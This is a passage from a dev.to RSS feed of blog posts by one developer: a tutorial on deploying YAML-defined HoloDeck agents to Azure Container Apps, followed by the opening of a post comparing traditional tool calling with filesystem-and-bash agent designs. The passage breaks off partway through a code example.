&lt;p&gt;Anthropic's contextual retrieval technique isn't magic. It's just good engineering: understand what information is lost in your pipeline, and put it back. Combine vector and keyword search with RRF instead of betting everything on embeddings. Add a reranker if you can. The Hierarchical Document Tool I'm building takes that same philosophy and extends it to deeply structured documents where &lt;em&gt;position in the hierarchy is meaning itself&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;RAG had promise. It still does. But it's time we stopped treating information retrieval as a solved problem that just needs a vector database, and started treating it as the hard, nuanced, domain-specific engineering challenge it's always been.&lt;/p&gt;

&lt;p&gt;The shiny new thing will always be tempting. But sometimes the biggest gains come from going back and doing the old thing properly.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post is part of a series on building AI agent tooling. Read my previous post on &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;Agentic Memory: Bash + File System Is All You Need&lt;/a&gt; for more on the patterns I'm implementing in HoloDeck.&lt;/em&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Wed, 28 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/from-yaml-to-production-deploying-holodeck-agents-to-azure-container-apps-2a1e</link>
      <guid>https://dev.to/jeremiahbarias/from-yaml-to-production-deploying-holodeck-agents-to-azure-container-apps-2a1e</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwysk3kpln2iedwz6j1s3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwysk3kpln2iedwz6j1s3.png" alt=" " width="800" height="281"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps
&lt;/h1&gt;

&lt;p&gt;Your agent works locally. The evaluations pass. Chat sessions flow smoothly. Now comes the question every agent developer faces: how do I get this thing into production?&lt;/p&gt;

&lt;p&gt;Traditionally, this is where the real work begins—Dockerfiles, container registries, Kubernetes manifests, ingress controllers, health checks. But with HoloDeck's new &lt;code&gt;deploy&lt;/code&gt; command, you can go from a local YAML configuration to a production endpoint in a few commands. No Kubernetes required.&lt;/p&gt;

&lt;p&gt;In this guide, we'll walk through deploying a customer support agent to Azure Container Apps.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Customer Support Agent
&lt;/h2&gt;

&lt;p&gt;Let's start with what we're deploying. The &lt;code&gt;customer-support&lt;/code&gt; agent in &lt;code&gt;sample/customer-support/ollama/&lt;/code&gt; (from &lt;a href="https://github.com/justinbarias/holodeck-samples" rel="noopener noreferrer"&gt;github.com/justinbarias/holodeck-samples&lt;/a&gt;) is a context-aware support chatbot with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Knowledge base search&lt;/strong&gt; via vector stores for product documentation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FAQ lookup&lt;/strong&gt; for quick answers to common questions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Product catalog search&lt;/strong&gt; for subscription plans and pricing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Conversation memory&lt;/strong&gt; via MCP for context persistence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's the core configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: customer-support
description: Context-aware customer support agent with knowledge base integration

model:
  provider: ollama
  name: gpt-oss:20b
  temperature: 0.3
  max_tokens: 4096
  endpoint: http://truenas.home:11434

instructions:
  file: instructions/system-prompt.md

tools:
  # Knowledge Base - Product documentation and support articles
  - name: knowledge_base
    type: vectorstore
    description: Search product documentation and support articles
    database: chromadb
    embedding_model: nomic-embed-text:latest
    top_k: 5
    source: data/knowledge_base.md

  # FAQ Database - Frequently asked questions
  - name: faq
    type: vectorstore
    description: Search frequently asked questions for quick answers
    database: chromadb
    embedding_model: nomic-embed-text:latest
    source: data/faq.json
    top_k: 3

  # Memory - Conversation persistence via MCP
  - name: memory
    type: mcp
    description: Store and retrieve conversation context
    command: npx
    args:
      - "-y"
      - "@modelcontextprotocol/server-memory"

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No Python code. Just YAML. The agent knows how to search documentation, look up FAQs, and remember conversation context—all defined declaratively.&lt;/p&gt;

&lt;h2&gt;
  
  
  Adding Deployment Configuration
&lt;/h2&gt;

&lt;p&gt;To deploy this agent, we add a &lt;code&gt;deployment&lt;/code&gt; section to &lt;code&gt;agent.yaml&lt;/code&gt;. This tells HoloDeck where to push the container image and which cloud provider to use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;deployment:
  registry:
    url: ghcr.io
    repository: justinbarias/customer-support-agent
  target:
    provider: azure
    azure:
      subscription_id: &amp;lt;guid-of-subscription-id&amp;gt;
      resource_group: holodeck-aca
      environment_name: holodeck-env
      location: australiaeast
  protocol: rest
  port: 8080

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's break this down:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;registry.url&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Container registry (GitHub Container Registry in this case)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;registry.repository&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Repository name for the image&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;target.provider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cloud provider (&lt;code&gt;azure&lt;/code&gt;, &lt;code&gt;aws&lt;/code&gt;, or &lt;code&gt;gcp&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;target.azure.*&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure-specific settings—subscription, resource group, environment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;protocol&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;API protocol (&lt;code&gt;rest&lt;/code&gt; or &lt;code&gt;ag-ui&lt;/code&gt; for CopilotKit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;port&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Port the agent listens on&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Building the Container Image
&lt;/h2&gt;

&lt;p&gt;With the deployment configuration in place, building the image is a single command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy build agent.yaml

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's what happens:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Loading agent configuration from agent.yaml...

Build Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Platform: linux/amd64
  Protocol: rest
  Port: 8080

Preparing build context...
Connecting to Docker...
Building image ghcr.io/justinbarias/customer-support-agent:3443eda...

============================================================
  Build Successful!
============================================================

  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  ID: sha256:b7e145183148...

  Next steps:
    Run locally: docker run -p 8080:8080 ghcr.io/justinbarias/customer-support-agent:3443eda
    Push to registry: docker push ghcr.io/justinbarias/customer-support-agent:3443eda

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Behind the scenes, HoloDeck:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Generates a Dockerfile&lt;/strong&gt; using the &lt;code&gt;holodeck-base&lt;/code&gt; image&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Copies your agent files&lt;/strong&gt; (agent.yaml, instructions, data directories)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Creates an entrypoint script&lt;/strong&gt; that runs &lt;code&gt;holodeck serve&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Builds the image&lt;/strong&gt; with OCI-compliant labels&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tags it&lt;/strong&gt; with the current git SHA (&lt;code&gt;3443eda&lt;/code&gt;)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Want to see what would be built without actually building? Use &lt;code&gt;--dry-run&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy build agent.yaml --dry-run

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This shows the generated Dockerfile and build context without executing anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pushing to Registry
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;holodeck deploy push&lt;/code&gt; command is planned but not yet implemented. For now, use Docker directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Login to GitHub Container Registry
docker login ghcr.io -u USERNAME

# Push the image
docker push ghcr.io/justinbarias/customer-support-agent:3443eda


The push refers to repository [ghcr.io/justinbarias/customer-support-agent]
c57f153dc3b1: Pushed
cab5b36daf6a: Pushed
0190bcbc478d: Pushed
...
3443eda: digest: sha256:d807e905fed0... size: 4080

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Deploying to Azure Container Apps
&lt;/h2&gt;

&lt;p&gt;With the image in the registry, deployment is another single command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy run agent.yaml


Deploy Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Tag: 3443eda
  Platform: linux/amd64
  Provider: azure
  Port: 8080

Deployment Successful!
  Service: customer-support
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Health: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;HoloDeck creates an Azure Container App with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;External ingress&lt;/strong&gt; with automatic HTTPS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Health checks&lt;/strong&gt; on &lt;code&gt;/health&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto-scaling&lt;/strong&gt; based on HTTP traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Environment variables&lt;/strong&gt; for LLM API keys (passed through securely)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The agent is now live at the generated URL.&lt;/p&gt;

&lt;h2&gt;
  
  
  Testing the Deployed Agent
&lt;/h2&gt;

&lt;p&gt;Let's verify the deployment with a health check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health


{
  "status": "healthy",
  "agent_name": "customer-support",
  "agent_ready": true,
  "active_sessions": 0,
  "uptime_seconds": 14.41
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent is healthy and ready to receive requests.&lt;/p&gt;

&lt;p&gt;To chat with the agent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -X POST https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/chat \
  -H "Content-Type: application/json" \
  -d '{"message": "What is your return policy?"}'

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Managing Deployments
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Check Status
&lt;/h3&gt;

&lt;p&gt;At any time, you can check the deployment status:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy status agent.yaml


Deployment Status
  Service: customer-support
  Provider: azure
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Updated: 2026-01-28T00:27:28.537340+00:00

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tear Down
&lt;/h3&gt;

&lt;p&gt;When you're done, clean up the deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy destroy agent.yaml

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This removes the Container App from Azure. The image remains in the registry for future deployments.&lt;/p&gt;

&lt;h3&gt;
  
  
  State Tracking
&lt;/h3&gt;

&lt;p&gt;HoloDeck tracks deployment state locally in &lt;code&gt;.holodeck/deployments.json&lt;/code&gt;. This allows it to manage updates and teardowns without querying the cloud provider each time.&lt;/p&gt;

&lt;h2&gt;
  
  
  What About AWS and GCP?
&lt;/h2&gt;

&lt;p&gt;AWS App Runner and GCP Cloud Run support are coming soon. The configuration looks similar:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# AWS App Runner (planned)
deployment:
  target:
    provider: aws
    aws:
      region: us-east-1
      cpu: 1
      memory: 2048

# GCP Cloud Run (planned)
deployment:
  target:
    provider: gcp
    gcp:
      project_id: my-project
      region: us-central1
      memory: 512Mi

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For now, you can use &lt;code&gt;holodeck deploy build&lt;/code&gt; to create the container image, push it to any registry, and deploy manually to your preferred platform. See the &lt;a href="https://docs.useholodeck.ai/guides/deployment/#diy-deployment" rel="noopener noreferrer"&gt;DIY Deployment section&lt;/a&gt; in the deployment guide for details.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;We went from a YAML configuration to a production API endpoint in four steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Add deployment config&lt;/strong&gt; to agent.yaml&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build&lt;/strong&gt; with &lt;code&gt;holodeck deploy build&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Push&lt;/strong&gt; the image to a registry&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy&lt;/strong&gt; with &lt;code&gt;holodeck deploy run&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;No Dockerfiles to write. No Kubernetes to configure. No infrastructure to manage.&lt;/p&gt;

&lt;p&gt;The full deployment documentation is available in the &lt;a href="https://docs.useholodeck.ai/guides/deployment" rel="noopener noreferrer"&gt;Deployment Guide&lt;/a&gt;. Give it a try with your own agents—and let us know how it goes.&lt;/p&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>azure</category>
      <category>devops</category>
    </item>
    <item>
      <title>Building a Filesystem + Bash Based Agentic Memory System (Part 1)</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 16 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/building-a-filesystem-bash-based-agentic-memory-system-part-1-4nan</link>
      <guid>https://dev.to/jeremiahbarias/building-a-filesystem-bash-based-agentic-memory-system-part-1-4nan</guid>
      <description>&lt;h1&gt;
  
  
  Building a Filesystem + Bash Based Agentic Memory System (Part 1)
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2l7pu2vbntw6q4wsi3a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2l7pu2vbntw6q4wsi3a.png" alt=" " width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Part 1 of 3: Research, Patterns, and Design Goals&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;A few days ago, I wrote about &lt;a href="https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh"&gt;how I reduced my agent's token consumption by 83%&lt;/a&gt; by implementing a &lt;code&gt;ToolFilterManager&lt;/code&gt; that dynamically selects which tools to expose based on query relevance. That tackled the first major pattern from Anthropic's &lt;a href="https://www.anthropic.com/engineering/advanced-tool-use" rel="noopener noreferrer"&gt;Advanced Tool Use&lt;/a&gt; article—the &lt;strong&gt;tool search tool&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;But that article describes &lt;em&gt;three&lt;/em&gt; patterns, and I've been eyeing the second one: &lt;strong&gt;programmatic tool calling&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The idea is to let Claude "orchestrate tools through code rather than through individual API round-trips." Instead of the model making 20 sequential tool calls (each requiring an inference pass), it writes a single code block that executes all of them, processing outputs in a sandboxed environment without inflating context. Anthropic reports a 37% token reduction on complex tasks with this approach.&lt;/p&gt;

&lt;p&gt;This got me thinking: what if we took this further? What if instead of code execution, we gave agents direct filesystem and bash access?&lt;/p&gt;

&lt;p&gt;Welcome to Part 1 of this rabbit hole.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are we talking about?
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why Filesystem + Bash?&lt;/li&gt;
&lt;li&gt;Existing Work&lt;/li&gt;
&lt;li&gt;How It Works: Traditional vs Filesystem-Based&lt;/li&gt;
&lt;li&gt;Bridging the Gap: MCP as CLI&lt;/li&gt;
&lt;li&gt;Design Goals for My Experiment&lt;/li&gt;
&lt;li&gt;What This Isn't&lt;/li&gt;
&lt;li&gt;Next Up&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why Filesystem + Bash?
&lt;/h2&gt;

&lt;p&gt;Vercel published a piece on &lt;a href="https://vercel.com/blog/how-to-build-agents-with-filesystems-and-bash" rel="noopener noreferrer"&gt;building agents with filesystems and bash&lt;/a&gt; that crystallized something I'd been mulling over. Their core insight:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;LLMs have been trained on massive amounts of code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Models already know how to &lt;code&gt;grep&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;ls&lt;/code&gt;. They've seen millions of examples of bash usage during training. You don't need to teach them your custom &lt;code&gt;SearchCodebase&lt;/code&gt; tool—they already know &lt;code&gt;grep -r "pricing objection" ./transcripts/&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Their results were compelling: a sales call summarization agent went from $1.00 to $0.25 per call on Claude Opus while &lt;em&gt;improving&lt;/em&gt; output quality. That's not a typo—cheaper AND better.&lt;/p&gt;

&lt;p&gt;The reason? &lt;strong&gt;Contextual precision.&lt;/strong&gt; Vector search gives you semantic approximations. Prompt stuffing hits token limits. But &lt;code&gt;grep -r&lt;/code&gt; returns exactly what you asked for, nothing more.&lt;/p&gt;

&lt;p&gt;If you've used Claude Code, you've seen this pattern in action. The agent doesn't call abstract tools—it has a filesystem and runs commands against it. The model thinks in &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;head&lt;/code&gt;, &lt;code&gt;tail&lt;/code&gt;, and &lt;code&gt;jq&lt;/code&gt;, not &lt;code&gt;ReadFile(path="/foo/bar")&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Existing Work
&lt;/h2&gt;

&lt;p&gt;I'm not the first person down this path.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://docs.turso.tech/agentfs/introduction" rel="noopener noreferrer"&gt;AgentFS&lt;/a&gt;&lt;/strong&gt; from Turso is a filesystem abstraction built on SQLite. Their pitch: "copy-on-write isolation, letting agents safely modify files while keeping your original data untouched." Everything lives in a single portable SQLite database—easy to snapshot, share, and audit. They've built CLI wrappers and SDKs for TypeScript, Python, and Rust. It's marked as ALPHA and explicitly not for production, but the architecture is interesting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; is the obvious reference implementation. Anthropic gave their coding agent real filesystem access with sandboxing, and it works remarkably well. The agent naturally uses bash patterns it learned during training.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vercel's &lt;code&gt;bash-tool&lt;/code&gt;&lt;/strong&gt; provides sandboxed bash execution alongside their AI SDK. Their examples show domain-to-filesystem mappings: customer support data organized by customer ID with tickets and conversations as nested files, sales transcripts alongside CRM records.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;mcp-cli&lt;/a&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;a href="https://github.com/f/mcptools" rel="noopener noreferrer"&gt;mcptools&lt;/a&gt;&lt;/strong&gt; enable calling MCP servers from the command line. This is the missing link—it lets agents invoke MCP tools via bash and redirect output to files, bridging the gap between structured tool definitions and filesystem-based execution.&lt;/p&gt;

&lt;h2&gt;
  
  
  How It Works: Traditional vs Filesystem-Based
&lt;/h2&gt;

&lt;p&gt;Before diving deeper, let me illustrate the fundamental difference between these approaches.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional Agentic Tool Calling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  TRADITIONAL TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends ALL 16 tool definitions)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll use     │
                              │ search_docs &amp;amp; │
                              │ query_database│
                              │ tools"        │
                              └───────┬───────┘
                                      │
                                      ▼
                         Agent Executes Tools
                         search_docs("pricing")
                         query_database("customers")
                                      │
                                      ▼
                      ┌───────────────────────────────┐
                      │  RAW OUTPUT (1000s of tokens!)│
                      │  [full doc contents,          │
                      │   all 500 DB rows...]         │
                      └───────────────┬───────────────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │  (processes   │
                              │   ENTIRE      │
                              │   output)     │
                              └───────┬───────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │   Response    │
                              └───────────────┘

  Problems:
  ├── 🔴 All tool definitions sent every request (5,888 tokens just for schemas!)
  ├── 🔴 Full tool output dumped into context (DB query = 500 rows in context)
  └── 🔴 Each tool call = 1 inference round-trip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Filesystem + Bash Based Tool Calling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  FILESYSTEM + BASH TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends sandbox tool + fs structure)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll explore │
                              │  the data:    │
                              │  ls, cat..."  │
                              └───────┬───────┘
                                      │
            ┌─────────────────────────┴─────────────────────────┐
            │                                                   │
            ▼                                                   │
  ┌───────────────────────┐                                     │
  │   Sandbox Execution   │                                     │
  │   $ ls ./customers/   │                                     │
  │   &amp;gt; acme/ globex/     │                                     │
  │     initech/ ...      │──────┐                              │
  └───────────────────────┘      │                              │
                                 │  (output written to file     │
                                 │   or returned as path)       │
                                 ▼                              │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Found customers. Now:    │                │
                  │   grep -r 'pricing' ./docs │                │
                  │   | head -20"              │                │
                  └─────────────┬──────────────┘                │
                                │                               │
                                ▼                               │
                  ┌───────────────────────┐                     │
                  │   Sandbox Execution   │                     │
                  │   $ grep -r 'pricing' │                     │
                  │     ./docs | head -20 │                     │
                  └─────────────┬─────────┘                     │
                                │                               │
                                ▼                               │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Need more detail on      │                │
                  │   enterprise tier:         │                │
                  │   awk '/enterprise/,/---/' │◀───────────────┘
                  │     ./docs/pricing.md"     │     (loop until
                  └─────────────┬──────────────┘      sufficient
                                │                     context)
                                ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (with only  │
                        │   relevant   │
                        │   context)   │
                        └──────────────┘

  Benefits:
  ├── 🟢 Minimal tool definitions (just "sandbox" tool)
  ├── 🟢 Agent controls what enters context (grep, head, awk filter results)
  ├── 🟢 LLM already knows bash (trained on millions of examples)
  └── 🟢 Composable commands (pipes, redirects, filters)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Key Insight
&lt;/h3&gt;

&lt;p&gt;The traditional approach treats the LLM as a passive consumer—it requests data and gets &lt;em&gt;everything&lt;/em&gt; back. The filesystem approach treats the LLM as an active explorer—it navigates, filters, and retrieves only what it needs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional:    "Give me all the data, I'll figure it out"
                 └── Context explodes, tokens burn 🔥

Filesystem:     "Let me look around and grab what I need"
                 └── Context stays lean, costs drop 📉
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Bridging the Gap: MCP as CLI
&lt;/h2&gt;

&lt;p&gt;The diagrams above assume files already exist in the sandbox. But where do they come from?&lt;/p&gt;

&lt;p&gt;This is where MCP CLI tools bridge the gap. Instead of MCP servers returning results directly into the LLM's context, they can be invoked as bash commands that write output to files.&lt;/p&gt;

&lt;h3&gt;
  
  
  MCP as CLI Commands
&lt;/h3&gt;

&lt;p&gt;Several tools enable calling MCP servers from the command line:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.philschmid.de/mcp-cli" rel="noopener noreferrer"&gt;mcp-cli&lt;/a&gt;&lt;/strong&gt; by Phil Schmid uses a clean syntax:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List available servers and tools&lt;/span&gt;
mcp-cli

&lt;span class="c"&gt;# Inspect a tool's schema&lt;/span&gt;
mcp-cli filesystem/read_file

&lt;span class="c"&gt;# Execute a tool&lt;/span&gt;
mcp-cli filesystem/read_file &lt;span class="s1"&gt;'{"path": "./README.md"}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/f/mcptools" rel="noopener noreferrer"&gt;mcptools&lt;/a&gt;&lt;/strong&gt; offers similar functionality:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mcp call read_file &lt;span class="nt"&gt;--params&lt;/span&gt; &lt;span class="s1"&gt;'{"path":"README.md"}'&lt;/span&gt; npx &lt;span class="nt"&gt;-y&lt;/span&gt; @modelcontextprotocol/server-filesystem ~
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Integration Pattern
&lt;/h3&gt;

&lt;p&gt;Here's how traditional tools integrate with the filesystem approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;═══════════════════════════════════════════════════════════════════════
  DATA INGESTION: MCP → SANDBOX FILESYSTEM
═══════════════════════════════════════════════════════════════════════

  ┌─ LLM decides it needs customer data ───────────────────────────────
  │
  │  "I need to query the database for enterprise customers.
  │   Let me fetch that data into my workspace."
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ SANDBOX EXECUTION ────────────────────────────────────────────────
  │
  │  $ mcp-cli database/query_customers '{"tier": "enterprise"}' \
  │      &amp;gt; ./sandbox/data/customers.json
  │
  │  $ mcp-cli vectorstore/search '{"query": "pricing policy"}' \
